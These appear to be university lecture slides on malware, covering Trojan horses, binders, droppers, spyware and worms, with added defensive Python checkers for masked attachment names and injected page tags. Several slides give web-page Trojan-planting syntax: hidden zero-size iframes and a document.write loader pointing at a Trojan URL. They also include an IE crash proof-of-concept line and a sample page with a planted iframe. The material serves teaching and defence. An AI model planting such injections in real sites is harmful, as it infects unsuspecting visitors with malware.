Trojan Horse

The Attack and Defense of Computers
Dr. 許富皓
1
Malware
2
Malicious Software (Malware):
Security tools and toolkits
Back doors (trap doors)
Logic bombs
Viruses
Worms
Binders
Droppers
Trojan Horses
Bacteria or rabbit programs.
Spyware
Rootkit
URL Injection
Dialers
3
Security Tools and toolkits
Automatically scan for computer security
weaknesses.
Can be used by both security professionals and
attackers.
E.g. Nessus, COPS, ISS, Tiger, … and so on.
There are also programs and tool sets whose only
function is to attack computers.
Script kiddies
• P.S. These tools may damage the systems that install them or
may contain booby-traps that will compromise the systems that
install them.
4
Logic Bombs
A logic bomb is a piece of code
intentionally inserted into a software system
that will set off a malicious function when
specified conditions are met.
For example, a programmer may hide a piece of
code that starts deleting files, should he ever
leave the company (and the salary database).
Usually written by insider programmers.
5
Logic Bombs and Viruses and
Worms
Software that is inherently malicious, such as
viruses and worms, often contains logic bombs that
execute a certain payload at a pre-defined time or
when some other condition is met.
Many viruses attack their host systems on specific
dates, such as Friday the 13th or April
Fool's Day.
Trojans that activate on certain dates are often
called "time bombs".
6
Key Logger
A program or hardware device that captures
every key depression on the computer.
Also known as "Keystroke Cops," they are
used to monitor a user's activities by
recording every keystroke the user makes,
including typos, backspacing and retyping.
7
Security Concerns about Key
Loggers
Keystroke logging can be achieved by both hardware and
software means.
There is no easy way to prevent keylogging software from being
installed on your PC, as it is usually done by stealth.
If you are using a home PC, then it is likely to be free of
any keystroke logging hardware (but remember there may
be keystroke logging software).
Try to avoid typing private details on public PCs, and
always try to avoid visiting sites on public PCs that
require you to enter your login details, e.g. an online
banking account.
8
Example
Ardamax Keylogger [1][2]
9
Dialers
A program that
replaces the phone number in a modem's dial-up
connection with a long-distance number, often out of
the country, in order to run up phone charges on pay-per-dial numbers
dials out at night to send keylogger or other information
to an attacker.
10
URL Injection
Changes the URLs that are submitted to servers belonging
to some or all domains.
11
Bacteria and Rabbits
Bacteria (also known as rabbit programs)
are a type of malware that create many
instances of themselves, or run many times
simultaneously, in order to consume large
amounts of system resources.
Bacteria create a denial of service effect as
legitimate programs may no longer be able
to run, or at least may not run properly.
12
Binder [CA]
13
Definition of Binder
A tool that combines two or more files into a
single file, usually for the purpose of hiding one of
them.
A binder compiles the list of files that you select
into one host file, which you can rename.
A host file is a simple custom compiled program that
will decompress and launch the embedded programs.
When you start the host, the embedded files in it are
automatically decompressed and launched.
14
Example
When a Trojan is bound with Notepad, for
instance, the result will appear to be
Notepad, and appear to run like
Notepad, but the Trojan will also be run.
15
Program
YAB: Yet Another Binder
User Guide
16
Dropper [Wikipedia]
17
Definition of a Dropper
A dropper is a program (malware
component) that has been designed to
"install" some sort of malware (virus,
backdoor, etc) to a target system.
Single stage: the malware code can be
contained within the dropper in such a way as
to avoid detection by virus scanners
Two stages: the dropper may download the
malware to the target machine once activated
18
Types of Droppers
There are two major types of droppers:
those that do not require user interaction
• operate by exploiting a vulnerability in the
target system
those that require user interaction by
convincing the user that it is some legitimate or
benign program.
19
Examples
8sec!Trojan
20
Trojan Horse [Wikipedia]
21
Trojan Horse
In the context of computer software, a Trojan horse is a
malicious program that is disguised as or embedded within
legitimate software.
Trojans use false and fake names to trick users into
executing them.
These strategies are often collectively termed social engineering.
A Trojan is designed to operate with functions unknown to
the victim.
The useful, or seemingly useful, functions serve as
camouflage for these undesired functions.
22
Properties of Trojan Horses
Trojan horse programs cannot operate autonomously, in
contrast to some other types of malware, like worms.
Just as the Greeks needed the Trojans to bring the horse
inside for their plan to work,
Trojan horse programs depend on actions by the intended victims:
even if Trojans replicate and distribute themselves, each new
victim must run the program/Trojan.
For the above reasons, a Trojan horse's virulence depends
on
successful implementation of social engineering concepts
but doesn't depend on
flaws in a computer system's security design or configuration.
23
Categories of Trojan Horses
There are two common types of Trojan horses:
otherwise useful software that has been corrupted by
a cracker inserting malicious code that executes while
the program is used.
• Examples include various implementations of
- weather alerting programs
- computer clock setting software
- peer-to-peer file sharing utilities.
a standalone program that masquerades as something
else, like a game or image file (e.g.
firework.jpg.exe in Windows).
24
Malware Parasitizes inside Trojan
Horses
In practice, Trojan Horses in the wild often
contain:
spying functions (such as a packet sniffer)
backdoor functions that allow a computer,
unbeknownst to the owner, to be remotely controlled
from the network, creating a zombie computer.
The Sony/BMG rootkit Trojan, distributed on
millions of music CDs through 2005, did both of
these things.
Because Trojan horses often have these harmful
behaviors, there often arises the misunderstanding
that such functions define a Trojan Horse.
25
Example of a Simple Trojan Horse
A simple example of a Trojan horse would
be a program named
waterfalls.scr.exe claiming to be a
free waterfall screensaver which, when run,
instead begins erasing all the files on the
computer.
26
E-Mail Trojan Horses
On the Microsoft Windows platform, an attacker might
attach a Trojan horse with an innocent-looking filename to
an email message which entices the recipient into opening
the file.
The Trojan horse itself would typically be a Windows
executable program file, and thus must have an executable
filename extension such as .exe, .com, .scr, .bat,
or .pif.
Since Windows is sometimes configured by default to hide
filename extensions from the user, the Trojan horse's extension
can be "masked" by giving it a name such as
Readme.txt.exe. With file extensions hidden, the user would
only see Readme.txt and could mistake it for a harmless text
file.
Icons can also be chosen to imitate the icon associated with
a different and benign program, or file type.
27
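To make the masking concrete, here is an added example (not from the slides) in Python that shows what a user sees when Windows hides known extensions and triages attachment names the way a mail gateway might, using the names from this deck (Readme.txt.exe, waterfalls.scr.exe, susie.jpg.exe); the extension sets and the verdict names are assumptions.

```python
import os

# Extensions Windows runs as programs; the slide lists .exe, .com, .scr, .bat and .pif.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".pif"}
# Extensions a user expects to be harmless data (assumed list, extend as needed).
DATA_EXTS = {".txt", ".jpg", ".jpeg", ".gif", ".png", ".doc", ".pdf", ".htm", ".html"}


def displayed_name(filename, hide_known_extensions=True):
    """Return the name as Explorer shows it.

    With "Hide extensions for known file types" on (the Windows default the
    slide refers to), only the final extension disappears, so Readme.txt.exe
    is shown as Readme.txt.
    """
    if not hide_known_extensions:
        return filename
    stem, ext = os.path.splitext(filename)
    if ext.lower() in EXECUTABLE_EXTS | DATA_EXTS:
        return stem
    return filename


def assess_attachment(filename):
    """Classify an attachment name; returns (verdict, reason).

    block      - executable whose name pretends to be a data file, or one that
                 stacks two executable extensions (Readme.txt.exe, waterfalls.scr.exe)
    quarantine - plain executable attachment (setup.exe): hold for review
    allow      - not an executable type at all
    """
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    if ext not in EXECUTABLE_EXTS:
        return ("allow", "not an executable type")
    inner_ext = os.path.splitext(stem)[1].lower()
    shown = displayed_name(filename)
    if inner_ext in DATA_EXTS:
        return ("block", f"executable masquerading as {inner_ext} file; user sees {shown!r}")
    if inner_ext in EXECUTABLE_EXTS:
        return ("block", f"double executable extension {inner_ext}{ext}")
    return ("quarantine", f"executable attachment ({ext})")


def triage_attachments(filenames):
    """Run assess_attachment over a batch and return {name: (verdict, reason)}."""
    return {name: assess_attachment(name) for name in filenames}


if __name__ == "__main__":
    # Constructed sample names taken from the deck plus two benign ones.
    for name, (verdict, reason) in triage_attachments(
        ["Readme.txt.exe", "waterfalls.scr.exe", "susie.jpg.exe", "setup.exe", "notes.txt"]
    ).items():
        print(f"{name:22} {verdict:10} {reason}")
```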
Trojan Downloader [F-Secure][Microsoft]
Trojan downloader is usually a standalone program that
attempts to secretly download and run other files from
remote web and ftp sites.
Usually Trojan downloaders
download different Trojans and backdoors
activate them on an affected system without the user's approval.
A Trojan downloader, when run, usually installs itself on the
system and waits until an Internet connection becomes
available. After that it attempts to connect to a web or FTP
site, download a specific file or files and run them.
28
Commonly Used Methods of
Infection
Websites (掛馬, planting Trojans in web pages).
E-mails.
Downloaded Files.
29
Websites
You can be infected by visiting a rogue website.
Internet Explorer is most often targeted by makers of
Trojans and other pests, because it contains numerous
bugs, some of which improperly handle data (such as
HTML or images) by executing it as a legitimate
program.
• Attackers who find such vulnerabilities can then specially craft
a bit of malformed data so that it contains a valid program to
do their bidding.
The more "features" a web browser has (for example
ActiveX objects, and some older versions of Flash or
Java), the higher your risk of having security holes that
can be exploited by a Trojan horse.
30
Example 1: Microsoft IE window() Arbitrary
Code Execution Vulnerability [Secunia]
The vulnerability is caused by certain objects not being
initialized correctly when the window() function is used
in conjunction with the <body onload> event.
This can be exploited to execute arbitrary code on a
vulnerable browser via some specially crafted JavaScript
code called directly when a site has been loaded.
Example:
<body onload="window();">
Successful exploitation requires that the user is e.g. tricked
into visiting a malicious website.
PROOF OF CONCEPT
31
Explanation [Computer Terrorism]
32
<body onLoad=…> [HTML Code Tutorial]
The browser triggers onLoad when the
document is finished loading. The contents
of onLoad are one or more JavaScript
commands. So, for example, the following
<body ...> tag tells the browser to
bring up an alert box once the page is
completely loaded:
<BODY onLoad="alert('hello world!')">
33
MS IE - Crash on JavaScript
window()- calling (1)
There is a bug in Microsoft Internet Explorer
which causes it to crash.
The bug occurs because Microsoft Internet Explorer
can't handle a call to a JavaScript function that has the
name of the "window" object.
(window is a built-in object in JavaScript.)
34
MS IE - Crash on JavaScript
window()- calling (2) [Symantec]
Internet Explorer fails to properly initialize the JavaScript
'Window()' function. When the 'onLoad' handler is set
to call the improperly initialized 'Window()' function, the
Web browser attempts to call the address 0x006F005B,
which is derived from the Unicode representation of
'OBJECT'.
CALL DWORD [ECX+8]
1. Crash, if pointing to non-code.
2. Execution, if pointing to code.
It is shown that JavaScript prompt boxes can be used by
attackers to fill the memory region at 0x00600000 with
attacker-supplied data, allowing executable machine code
to be placed into the required address space.
35
Dangerous Web Site
The web site pointed to by the following URL
is one containing the trap described in the
previous slides.
HTTP MSIE JavaScript OnLoad Rte CodeExec [Symantec]
http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
36
Example 2: Trojan Horse Exploits
Image Flaw [Declan McCullagh et al.]
EasyNews, a provider of Usenet newsgroups, said
it has identified two JPEG images that take
advantage of a previously identified flaw (a heap-based
buffer overflow [Michael Cobb]) in the way
Microsoft software handles graphics files.
Windows users could have their computers
infected merely by opening one of those Trojan
horse images.
Attackers tried to use these JPEGs to download
Trojan (horse programs) to vulnerable computers.
37
Example 3: Compromise a Web Server and Add
Hidden Download Instructions to Web Pages
Create a frame with size 0.
38
Web Page Trojan-Planting (掛馬) Syntax [OpenBlue]
39
After a site has been compromised through a [vulnerability],
[SQL Injection], [uploading a web shell (網馬)] or similar
techniques and a Trojan has been planted, the [planting code]
usually appears in the [first line or last line] of the affected web page.
40
Frame-based planting
Part of the syntax is as follows (木馬網址 stands for the Trojan's URL):
<iframe src=木馬網址 width=0 height=0></iframe>
41
JScript file planting
First save the following code as xxx.js, then upload this
file to the target site by whatever means are available
(木馬網址 stands for the Trojan's URL):
document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
Finally, the syntax for JScript planting is as follows
(part of the syntax only):
<script language=javascript src=xxx.js></script>
42
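The injection patterns on the last few slides (a zero-size <iframe>, or a <script src=xxx.js> include, typically dropped on the first or last line of a compromised page) can be checked for from the defender's side. The following Python scanner is an added example, not from the OpenBlue material; the sample page and the malicious.example URL are constructed.

```python
import re
from html.parser import HTMLParser


def _is_zero(value):
    """True for dimension values such as 0, '0' or 0px (html.parser strips quotes)."""
    if value is None:
        return False
    match = re.match(r"\s*(\d+)", value)
    return match is not None and int(match.group(1)) == 0


class _InjectionScanner(HTMLParser):
    """Records zero-size iframes and external script includes with their line numbers."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        line, _ = self.getpos()  # 1-based line of the tag start
        if tag == "iframe" and (_is_zero(attr.get("width")) or _is_zero(attr.get("height"))):
            self.hits.append(("hidden_iframe", line, attr.get("src")))
        elif tag == "script" and attr.get("src"):
            self.hits.append(("external_script", line, attr.get("src")))


def scan_page(html_text):
    """Return suspicious tags found in html_text.

    Each finding carries the tag kind, its line number, its src and whether it
    sits on the first or last line of the page, the position the slides say
    injected planting code usually occupies.
    """
    last_line = max(1, len(html_text.splitlines()))
    scanner = _InjectionScanner()
    scanner.feed(html_text)
    scanner.close()
    return [
        {"kind": kind, "line": line, "src": src, "at_edge": line in (1, last_line)}
        for kind, line, src in scanner.hits
    ]


# Constructed sample: a planted script include on line 1, the site's own script
# on line 2 and a planted zero-size iframe appended after </html> on the last line.
SAMPLE_PAGE = """<script language=javascript src=xxx.js></script><html>
<head><title>Company news</title><script src="/js/site.js"></script></head>
<body>
<h1>Welcome</h1>
<p>Nothing unusual here.</p>
</body>
</html>
<iframe src=http://malicious.example/t.htm width=0 height=0></iframe>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

A finding on an edge line that loads a script or frame the site does not own is the signature to alert on; the site's own includes in the head are reported too so that a reviewer can compare against a known-good list.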
Emails and Trojan Horses
The majority of Trojan horse infections occur
because the user was tricked into running an
infected program.
This is why you're not supposed to open
unexpected attachments on emails -- the
program is often a cute animation or a sexy
picture, but behind the scenes it infects the
computer with a Trojan or virus.
43
Microsoft Outlook
If you use Microsoft Outlook, you're
vulnerable to many of the same problems that
Internet Explorer has, even if you don't use
IE directly.
The same vulnerabilities exist since Outlook
allows email to contain HTML and images (and
actually uses much of the same code to process
these as Internet Explorer).
44
Downloaded Files
The infected program doesn't have to arrive
via email, though; it can be
sent to you in an Instant Message
downloaded from a Web site or by FTP
delivered on a CD or floppy disk
45
Precautions against Trojan Horses (1)
Trojan Horses are commonly spread through e-mail, much like other types of common viruses.
The only difference, of course, is that a
Trojan Horse is hidden.
The best ways to protect yourself and your
company from Trojan Horses are as follows:
If you receive e-mail from someone that you do not
know, or you receive an unknown attachment, never
open it right away.
As an e-mail user you should confirm the source.
• Some hackers have the ability to steal address books, so if
you see e-mail from someone you know that does not
necessarily make it safe.
46
Precautions against Trojan Horses (2)
When setting up your e-mail client make sure that you
have the settings so that attachments do not open
automatically.
Some e-mail clients come ready with an anti-virus
program that scans any attachments before they are
opened.
• If your client does not come with this, it would be best to
purchase one or download one for free.
Make sure your computer has an anti-virus program on
it and make sure you update it regularly.
• If you have an auto-update option included in your anti-virus
program you should turn it on; that way, if you forget to update
your software you can still be protected from threats.
47
Precautions against Trojan Horses (3)
Operating systems offer patches to protect their users
from certain threats and viruses, including Trojan Horses.
Software developers like Microsoft offer patches that in a sense
“close the hole” that the Trojan horse or other virus would use to
get through to your system. If you keep your system updated
with these patches your computer is kept much safer.
Avoid using peer-2-peer or P2P sharing networks like
Kazaa, Limewire, Ares, or Gnutella because
1) those programs are generally unprotected from Trojan Horses
2) Trojan Horses are especially easy to spread through these programs
Some of these programs do offer some virus protection but often
they are not strong enough.
48
Precautions against Trojan Horses (4)
NEVER download blindly from people or sites which you
aren’t 100% sure about.
However, legitimate web sites may be compromised by attackers who may
modify web pages to contain scripts that download malware.
Even if the file comes from a friend, you still must be sure
what the file is before opening it. (Ask your friend whether
she/he sent the file to you.)
Beware of hidden file extensions (under Windows,
susie.jpg.exe is only shown as susie.jpg).
Never use features in your programs that automatically get
or preview files (e.g. Outlook preview mode).
Never blindly type commands that others tell you to type, or
go to web sites mentioned by strangers.
49
Well-known Trojan Horses
Back Orifice
Back Orifice 2000
Beast Trojan
NetBus
SubSeven
Downloader-EV
Pest Trap
flooder
Tagasaurus
Vundo trojan
Gromozon Trojan
50
Experiment
Survey some Trojan horses to see what
approaches are adopted by them to fool a
user to execute them.
51
List of Trojan Horses
http://en.wikipedia.org/wiki/List_of_trojan_horses
52
Spyware [Wikipedia]
53
A Large Number of Toolbars, Some Added by
Spyware, Overwhelm an IE Session
54
Some Statistics about Spyware [A. Moshchuk et al. ]
A recent scan (2005) performed by
AOL/NCSA of 329 customers’ computers
found that 80% were infected with spyware
programs.
Each infected computer contained an
average of 93 spyware components.
55
Definition of Spyware
Spyware is computer software that is
installed surreptitiously on a personal
computer to
monitor
intercept
or
take partial control over
the user's interaction with the computer,
without the user's informed consent.
56
Activities of Spyware
Spyware programs can
secretly monitor the user's behavior and then
send this information to a hacker over the
Internet
collect various types of personal information
interfere with user control of the computer in
other ways, such as
• installing additional software
• redirecting Web browser activity
• diverting advertising revenue to a third party.
57
Spyware Functions [A. Moshchuk et al. ]
58
Types of Information Collected by
Spyware
Spyware can collect many different types of
information about a user.
More benign programs can attempt to track
what types of websites a user visits and send
this information to an advertisement agency.
More malicious versions can try to record what
a user types to try to intercept passwords or
credit card numbers.
Yet other versions simply launch pop-ups with
advertisements.
59
OSes vs. Spyware
As of 2006, spyware has become one of the
pre-eminent security threats to computer systems running Microsoft Windows OSes.
Some malware on the Linux and Mac OS
X platforms has behavior similar to
Windows spyware, but to date has not
become anywhere near as widespread.
60
Spyware Certification
The Spyware-Free Certification program
evaluates software to ensure that the
program does not install or execute any
forms of malicious code.
61
Typical Tactics Adopted by Spyware
Delivery of unsolicited pop-up advertisements.
Monitoring of Web-browsing activity for
marketing purposes.
Theft of personal information.
62
Adware
The term adware frequently refers to any software
which displays advertisements, whether or not it
does so with the user's consent.
Programs such as the Eudora mail client display
advertisements as an alternative to shareware
registration fees.
These classify as "adware" in the sense of
advertising-supported software, but not as
spyware.
Adware in this form does not operate surreptitiously or
mislead the user, and provides the user with a specific
service.
63
Spyware and Pop-up Ads
Spyware displays advertisements related to what it finds
from spying on you, not the ones posted by advertisers.
Claria Corporation's Gator Software and Exact
Advertising's BargainBuddy provide examples of this
sort of program.
Visited Web sites frequently install Gator on client
machines in a surreptitious manner, and it directs revenue
to the installing site and to Claria by displaying
advertisements to the user. The user experiences a large
number of pop-up advertisements.
64
Pop-up Ads
Pop-up ads or popups are a form of online
advertising on the World Wide Web.
They work by having certain web pages open a new web
browser window to display advertisements.
The pop-up window containing an advertisement
is usually generated by JavaScript, but can be
generated by other means as well.
65
Pop-under Ads
A variation on the pop-up window is the
pop-under advertisement. This opens a new
browser window, behind the active window.
Pop-unders interrupt the user less, but are
not seen until the desired windows are
closed, making it more difficult for the user
to determine which Web page opened them.
66
Dozens of Pop-up Ads Cover a
Desktop.
67
Web Activity Monitor
Other spyware behavior, such as reporting on
websites the user visits, frequently accompany the
displaying of advertisements.
Monitoring web activity aims at building up a
marketing profile on users in order to sell
"targeted" advertisement impressions.
The prevalence of spyware has cast suspicion upon
other programs that track Web browsing, even for
statistical or research purposes.
• Some observers describe the Alexa Toolbar, an Internet
Explorer plug-in published by Amazon.com, as spyware (and
some anti-spyware programs report it as such) although many
users choose to install it.
68
Identity Theft and Fraud
Some spyware is closely associated with identity theft.
Spyware may transmit the following information to
attackers:
chat sessions,
user names,
passwords,
bank information, etc.
Spyware has principally become associated with identity
theft in that keyloggers are routinely packaged with
spyware.
John Bambenek, who researches information security, estimates
that identity thieves have stolen over $24 billion US dollars of
account information in the United States alone.
70
Routes of Infection
71
Routes of Infection
Spyware does not directly spread in the
manner of a computer virus or worm:
generally, an infected system does not attempt
to transmit the infection to other computers.
Instead, spyware gets on a system
through deception of the user
or
through exploitation of software vulnerabilities.
72
Masquerade
One way of distributing spyware involves
tricking users by manipulating security
features designed to prevent unwanted
installations.
73
Masquerade - Example
The Internet Explorer Web browser, by design,
prevents websites from initiating an unwanted
download.
Instead, a user action (such as clicking on a link)
must normally trigger a download.
However, links can prove deceptive:
For instance,
1. A pop-up ad may appear like a standard Windows dialog box.
2. The box contains a message such as "Would you like to
optimize your Internet access?" with links which look like
buttons reading Yes and No.
3. No matter which "button" the user presses, a download starts,
placing the spyware on the user's system.
74
A Masquerade Example
Malicious websites may attempt to install spyware on
readers' computers.
In this screenshot a website has triggered a pop-up that offers spyware
in the guise of a security upgrade.
75
Bundled with Shareware
Spyware can also come bundled with
shareware
other downloadable software
music CDs.
The user downloads a program (for instance, a
music program or a file-trading utility) and installs
it, and the installer additionally installs the
spyware. Although the desirable software itself
may do no harm, the bundled spyware does.
In some cases, spyware authors have paid shareware
authors to bundle spyware with their software.
In other cases, spyware authors have repackaged
desirable free software with installers that add spyware.
76
Bundled Shareware Example
The BearShare file-trading program, "supported" by WhenU spyware.
In order to install BearShare, users must agree to install "the SAVE! bundle"
from WhenU.
The installer provides only a tiny window in which to read the lengthy license
agreement. Although the installer claims otherwise, the software transmits users'
browsing activity to WhenU servers.
77
Through Trojan Horse
Classically, a Trojan horse, by definition,
smuggles in something dangerous in the guise of
something desirable. Some spyware programs get
spread in just this manner.
The distributor of spyware presents the program as
a useful utility — for instance as a Web
accelerator or as a helpful software agent.
Users download and install the software without
immediately suspecting that it could cause harm.
78
Vulnerabilities in Web Browsers
Some spyware authors infect a system by attacking
security holes
in the Web browser
or
in other software.
When the user navigates to a Web page controlled by the
spyware author, the page contains code which attacks the
browser and forces the download and install of spyware.
Common browser exploits target security vulnerabilities in
Internet Explorer and in the Microsoft Java runtime.
79
Notable Programs Distributed with
Spyware
Messenger Plus! (only if you agree to install their "sponsor" program)
Bearshare
Bonzi Buddy
DAEMON Tools (only if you agree to install their "sponsor" program)
DivX (except for the paid version, and the "standard" version without the
encoder). DivX announced removal of GAIN software from version 5.2.
Dope Wars
ErrorGuard
FlashGet (free version)
Grokster
Kazaa
Morpheus
RadLight
WeatherBug
EDonkey2000
80
Worm
81
Worms
Worms spread themselves by proactively
attacking programs with specific vulnerabilities.
The most frequently used attack approaches include
buffer overflow attacks, format string attacks,
integer overflow attacks, … and so on.
Morris Worm, 1988
Code Red, Slammer.
82
Comparisons between Viruses,
Trojan Horses, and Worms
The way they behave
How are they triggered?
How do they spread?
Need host programs?
83